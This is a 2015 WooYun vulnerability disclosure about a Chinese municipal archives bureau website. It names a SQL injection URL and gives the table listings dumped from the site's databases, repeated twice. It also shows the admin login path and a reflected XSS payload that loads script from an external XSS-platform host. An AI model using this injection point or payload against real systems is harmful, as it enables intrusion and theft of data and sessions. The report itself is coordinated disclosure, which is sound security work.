漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106913
漏洞标题:临沂档案局档案局SQL+反射XSS
相关厂商:临沂档案局
漏洞作者: DeadSea
提交时间:2015-04-10 18:27
修复时间:2015-05-29 18:28
公开时间:2015-05-29 18:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-10: 细节已通知厂商并且等待厂商处理中
2015-04-14: 厂商已经确认,细节仅向厂商公开
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开
简要描述:
求高rank
详细说明:
http://da.linyi.gov.cn/view.asp?id=324
存在SQL
跑出来的裤子多达122个
Database: pubs
[14 tables]
+--------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------+
Database: tempdb
[2 tables]
+--------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------+
Database: Northwind
[31 tables]
+--------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details |
| Order Subtotals |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------+
Database: msdb
[78 tables]
+--------------------------------+
| RTblClassDefs |
| RTblClassExtension |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
| systasks |
| systasks_view |
+--------------------------------+
Database: dangan
[26 tables]
+--------------------------------+
| da.D99_CMD |
| da.D99_REG |
| da.D99_Tmp |
| da.comd_list |
| da.foofoofoo |
| da.kill_kk |
| admin |
| da_global |
| da_gzdt |
| da_history |
| da_jijian |
| da_keji |
| da_kuaiji |
| da_lishi |
| da_photos |
| da_shengxiang |
| da_shiwu |
| da_wenshu |
| da_xxwj |
| dtproperties |
| jxzy |
| news |
| newscata |
| photocata |
| sysconstraints |
| syssegments |
+--------------------------------+
后台地址:http://da.linyi.gov.cn/newadmin/login.asp
登录任意用户名 名字都会镶嵌在源代码上
如登录wooyun
既然能镶嵌到html代码里
那么如果我们用<script src=http://www.xxs.la/TWWsZt></script>
登录是不是也能执行
尝试着看看
真的插入了。。。我也是醉了
漏洞证明:
http://da.linyi.gov.cn/view.asp?id=324
存在SQL
跑出来的裤子多达122个
Database: pubs
[14 tables]
+--------------------------------+
| authors |
| discounts |
| employee |
| jobs |
| pub_info |
| publishers |
| roysched |
| sales |
| stores |
| sysconstraints |
| syssegments |
| titleauthor |
| titles |
| titleview |
+--------------------------------+
Database: tempdb
[2 tables]
+--------------------------------+
| sysconstraints |
| syssegments |
+--------------------------------+
Database: Northwind
[31 tables]
+--------------------------------+
| Categories |
| CustomerCustomerDemo |
| CustomerDemographics |
| Customers |
| EmployeeTerritories |
| Employees |
| Invoices |
| Orders |
| Products |
| Region |
| Shippers |
| Suppliers |
| Territories |
| Alphabetical list of products |
| Category Sales for 1997 |
| Current Product List |
| Customer and Suppliers by City |
| Order Details Extended |
| Order Details |
| Order Subtotals |
| Orders Qry |
| Product Sales for 1997 |
| Products Above Average Price |
| Products by Category |
| Quarterly Orders |
| Sales Totals by Amount |
| Sales by Category |
| Summary of Sales by Quarter |
| Summary of Sales by Year |
| sysconstraints |
| syssegments |
+--------------------------------+
Database: msdb
[78 tables]
+--------------------------------+
| RTblClassDefs |
| RTblClassExtension |
| RTblDBMProps |
| RTblDBXProps |
| RTblDTMProps |
| RTblDTSProps |
| RTblDatabaseVersion |
| RTblEQMProps |
| RTblEnumerationDef |
| RTblEnumerationValueDef |
| RTblGENProps |
| RTblIfaceDefs |
| RTblIfaceHier |
| RTblIfaceMem |
| RTblMDSProps |
| RTblNamedObj |
| RTblOLPProps |
| RTblParameterDef |
| RTblPropDefs |
| RTblProps |
| RTblRelColDefs |
| RTblRelshipDefs |
| RTblRelshipProps |
| RTblRelships |
| RTblSIMProps |
| RTblScriptDefs |
| RTblSites |
| RTblSumInfo |
| RTblTFMProps |
| RTblTypeInfo |
| RTblTypeLibs |
| RTblUMLProps |
| RTblUMXProps |
| RTblVersionAdminInfo |
| RTblVersions |
| RTblWorkspaceItems |
| backupfile |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_primaries |
| log_shipping_secondaries |
| logmarkhistory |
| mswebtasks |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| sysalerts |
| syscachedcredentials |
| syscategories |
| sysconstraints |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysnotifications |
| sysoperators |
| syssegments |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
| systasks |
| systasks_view |
+--------------------------------+
Database: dangan
[26 tables]
+--------------------------------+
| da.D99_CMD |
| da.D99_REG |
| da.D99_Tmp |
| da.comd_list |
| da.foofoofoo |
| da.kill_kk |
| admin |
| da_global |
| da_gzdt |
| da_history |
| da_jijian |
| da_keji |
| da_kuaiji |
| da_lishi |
| da_photos |
| da_shengxiang |
| da_shiwu |
| da_wenshu |
| da_xxwj |
| dtproperties |
| jxzy |
| news |
| newscata |
| photocata |
| sysconstraints |
| syssegments |
+--------------------------------+
后台地址:http://da.linyi.gov.cn/newadmin/login.asp
登录任意用户名 名字都会镶嵌在源代码上
如登录wooyun
既然能镶嵌到html代码里
那么如果我们用<script src=http://www.xxs.la/TWWsZt></script>
登录是不是也能执行
尝试着看看
真的插入了。。。我也是醉了
修复方案:
你们懂的
版权声明:转载请注明来源 DeadSea@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-04-14 18:26
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。
最新状态:
暂无